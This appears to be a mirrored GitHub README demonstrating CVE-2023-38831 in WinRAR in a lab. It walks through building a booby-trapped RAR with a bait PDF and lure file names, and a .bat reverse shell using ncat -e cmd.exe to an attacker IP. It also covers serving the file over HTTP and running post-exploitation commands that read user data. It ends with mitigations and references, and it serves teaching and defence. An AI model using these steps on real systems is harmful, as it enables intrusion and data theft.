来源

关联漏洞

描述

A POC demo on CVE-2023-38831

介绍

# CVE-2023-38831
A POC demo on CVE-2023-38831

<p><strong>Brief description of vulnerability</strong></p>
<ul>
<li>CVE-2023-38831 is a software vulnerability.</li>
<li>The software that was exploited is WinRAR, which is used widely by almost everyone.</li>
<li>It is a software that helps different documents or files to make it into small archives (zip file format) which helps to save space that makes file sharing easier and faster process.</li>
<li>This vulnerability was discovered in April 2023.</li>
<li>It affects Windows Operating system and version 6.22 and below.</li>
<li>It was caused by a faulty function in WinRAR backend codes called “winrar.7FF6CE909948” that does not check on the parameters and compare the names of files in the zip directory and allowing 2 identical file such as “document.pdf” and a bat script naming “document.cmd” to bypass and be extracted.</li>
<li>It requires user interaction for exploitation to be successful.</li>
</ul>
<br />
<p><strong>How does the vulnerability work?</strong></p>

![image](https://github.com/user-attachments/assets/fdea3bb6-bcb7-41cc-85a8-5058116b3c71)


<h2>Demonstration of the exploit</h2>
<p><strong><u>First part of the exploitation</u></strong></p>
<p>The first half will take place at the attacker machine for the exploitation to begin.</p>



![image](https://github.com/user-attachments/assets/f058b383-1596-460b-823b-d69d123b7151)
<p>1) Firstly, we will need to create the exploitation folder containing the malicious attachment, “pdf”, the exploitation python code and bat script by the following command:
“git clone https://github.com/HDCE-inc/CVE-2023-38831”</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/14623401-2d67-4f43-b1f2-91b7771df500)
<p>2) This is what the folder contains before any exploitation take place,</p>
<ol>
<li>a document.pdf which is to lure the victim into clicking the malicious file</li>
<li>an exploit.py for the exploitation code</li>
<li>script.bat for run malicious script on victim machine</li>
</ol>
<p>&nbsp;</p>


![Picture2](https://github.com/user-attachments/assets/a9290955-bae0-465b-8f95-629c97d61a85)
<p>3) Finding out kali machine IP address via ifconfig:</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/5933a445-d448-459d-9fd5-191e1b91d719)
<p>4) We will then modify the existing script on script bat to the following command line(above image)</p>
<p>“start” is for the command line process to begin, “/min” is to minimise the command prompt at the background, ncat is to start connecting to the attacker ip address and via port 4444, and lastly -e cmd.exe is to execute the command line on command prompt.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/091a1f12-4f08-44cc-a19d-4d747631eeba)
<p>5) This shows the following exploit.py code being explained:</p>
<p><sup>1</sup> refers to the user input on the bait file name which is document.pdf, script file name which is bat.script and the output on what the victim see the RAR file as and in this case we will save it as getrich.rar.</p>
<p><sup>2</sup> refers to the checks done to validate if existing files exist in the CVE-2023-38831 folder in kali linux machine with the right naming convection and if the naming is wrong or duplicate file, error message will be printed and the program will stop and exit.</p>
<p><sup>3</sup> refers to creating a temporary file destination using os.mkdir() to stored the newly created file before being compressed into archive and used as workspace.</p>
<p><sup>4</sup> refers to a copy line, shutil.copyfile, to copy both the bait and script file to be stored in their respective directories within “tmp” to ensure that all the necessary files are correct and in placed before proceeding to next step. The next step, shutil.make_archieve, create an archive from the “tmp” called “tmp.zip” which contains everything in the “tmp” folder.</p>
<p><sup>5</sup> refers to the success of running the above code and successfully created a RAR file as the exploit via user input of the bait file, script file and output file name.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/67dedc59-7daf-436b-a0df-8260277fc5a8)
<p>6) After getting our IP address and modifying the bat script, we can now proceed to create the malicious “.rar” by running the command “python exploit.py” </p>
<p>The exploit.py will require the user input on 3 fields, the bait file name that exists which is document.pdf, the script file name that we have modified previously which is script.bat and an output RAR file name to lure the victim into downloading and clicking on the file which requires a name that is suitable for and in this case we used “steps-to-generate-income.rar”.
CVE-2023-38831 is then ready to exploit the victim machine.</p>
<p>&nbsp;</p>

<hr>
<p><strong><u>Second part of the exploitation</u></strong></p>
<p>The second half will then take place both on the kali machine and the victim machine which is a windows 11 VM.</p>

![image](https://github.com/user-attachments/assets/e6ef50e8-f7cb-4eb6-a1cc-c4349c8b9a2d)
<p>1) We will first either create a malicious website or send the attachment across to the victim.<br />On the left side, we will execute “python -m http.server 8080”. This command is a process to capture which IP address access this malicious URL which we then can know the victim IP address and listens for different HTTP requests such as “200” by a specific IP address. On the right side, the victim is lured to this IP address and is baited to download the file “steps-to-generate-income.rar”.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/aae2a839-c04f-4b0f-9ba4-af7bb1d54f87)
<p>2) Once the victim has successfully been lured to download the malicious file “steps-to-generate-income.rar”, it will show which IP address has downloaded the file together with the time frame. From this info, we can obtain the victim IP address.</p>
<p>&nbsp;</p>

![image](https://github.com/user-attachments/assets/36b6a961-1a70-4106-b375-325934496f9a)
<p>3) We will then set up a ncat on port 4444 on the kali machine as port 4444 is to synchronise with the same port as the one written in the script.bat to be executed on the victim machine.<br />Once the victim clicks on the document.pdf, the bat.script will run the command line and minimise in the background in a instance and this allow a backdoor connection for the attacker.</p>
<p>&nbsp;</p>

![Picture3](https://github.com/user-attachments/assets/c02b6c56-7d09-4d92-bdff-2e0de9efc70a)
<p>4) We will then able run different commands on the victim machine such as “C:\Windows” then to “dir” to list out all the different exe that is stored.</p>
<p></p>Here are three commands that was run on the victim machine:</p>
<p>First command as highlighted as “1” will be “net user” to see how many accounts are there and from this, we can conclude that there is only 1 account W11.</p> 
<p>Second command as highlighted as “2” is “systeminfo” to understand more about our victim machine and what privilege the user has, and in this instance is an administrator privilege.</p>
<p>Third command as highlighted as “3” will be navigating through random folders and in this case, we will run command such as “C:\Users\W11” then “dir” to know what type of files and folders, then “C:\Users\W11\Documents” then “dir” to know the contents in Documents directory and we are lucky this user save his password in a notepad.txt. We then print the details of this notepad in the command line to reveal the details, “type secret.txt”. The outcome shows that from this command line, we are able to read write and edit files in the victim machine where further action such as planting a keylogger can also be done to make the victim machine more vulnerable and exposed to more sensitive information.</p>

![image](https://github.com/user-attachments/assets/3f00f8a4-bb8f-415d-b213-d09ebdb9dd26)
<p>5) Lastly, we can create a notepad file on the user desktop by running this command<br />“echo "You've been hacked, please go to testingwebsite" > C:\Users\W11\D\hacked.txt” and hacked.txt will be created on the user desktop to show the victim that his machine has been exploited.</p>

<hr>

<h3>Prevention and Mitigation strategies</h3>
<ul>
<li>Upgrade to the latest WinRAR version as it only affects version 6.22 and below.
<ul>
<li>Pros : able to use software safely, performance of software improved</li>
<li>Cons: Old features of previous version might be gone or replaced</li>
</ul>
</li>
<li>Implementing the principle of Least privilege for all systems.
<ul>
<li>Pros : restrict the user rights can reduce impact and low the risk if attack occur</li>
<li>Cons: hard to be consistent to implement ever user has the right permission access in large organisation and this can cause inconsistency and error</li>
</ul>
</li>
<li>Practice basic cyber hygiene and always backup data to secure source.
<ul>
<li>Pros : able to identify phishing and suspicious website, prevent data loss in the event of attack</li>
<li>Cons: unnecessary data backup and lead to data redundancy and inconsistency for data that not meaningful for the organisation/li>
</ul>
</li>
<li>Always install anti-virus software as additional layer of security.</li>
</ul>

<hr>

<h3>References:</h3>
Chromium Docs - Severity Guidelines for Security Issues. (n.d.). Retrieved February 20, 2024, from https://chromium.googlesource.com/chromium/src/+/HEAD/docs/security/severity-guidelines.md#:~:text=High%20severity%20(S1)%20vulnerabilities%20allow,be%20rated%20as%20high%20severity.   

Deland-Han. (2014, February 19). Dynamic link library (DLL) - Windows Client. Microsoft Learn. https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/dynamic-link-library 

Gillis, A. S. (2023, September 26). principle of least privilege (POLP). Security. https://www.techtarget.com/searchsecurity/definition/principle-of-least-privilege-POLP 

GmbH, W. (n.d.). WinRAR 7.00 Final released. WinRAR Latest News. https://www.win-rar.com/singlenewsview.html?&L=0&cHash=c5bf79590657e32554c6683296a8e8aa&tx_ttnews%5Btt_news%5D=232  

Lab, S. (2023, September 26). Analysis of CVE-2023-38831 Zero-Day vulnerability in WinRAR. Penetration Testing and CyberSecurity Solution - SecureLayer7. https://blog.securelayer7.net/analysis-of-cve-2023-38831-zero-day-vulnerability-in-winrar/  

Patch management: benefits and best practices | Balbix. (2022, October 22). Balbix. https://www.balbix.com/insights/patch-management-benefits-and-best-practices/ 

Research, U. T. (2023, November 17). WinRAR CVE-2023-38831 Vulnerability: Malware Exploits & APT Attacks. https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day 

Slavin, B. (2024, March 18). Common DMARC problems faced by users | DMARC Report. DMARC Report. https://dmarcreport.com/blog/common-dmarc-problems-faced-by-users/ 

ThreatLocker. (2023, September 11). WinRAR Remote Code Execution. ThreatLocker. https://www.threatlocker.com/blog/winrar-remote-code-execution   

Traders’ Dollars in Danger: CVE-2023-38831 zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders. (2023, August 23). Group-IB. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/   

Vulnera. (2023, November 16). DarkCasino: a new APT threat leveraging WinRAR vulnerability - VULNERA. VULNERA - Vulnerability Management. Simplified. https://vulnera.com/newswire/darkcasino-a-new-apt-threat-leveraging-winrar-vulnerability/ 

文件快照

 [4.0K]  /data/pocs/7cb8e9a45ff3247f543555416f3f747d20e85022
└── [ 11K]  README.md

0 directories, 1 file

备注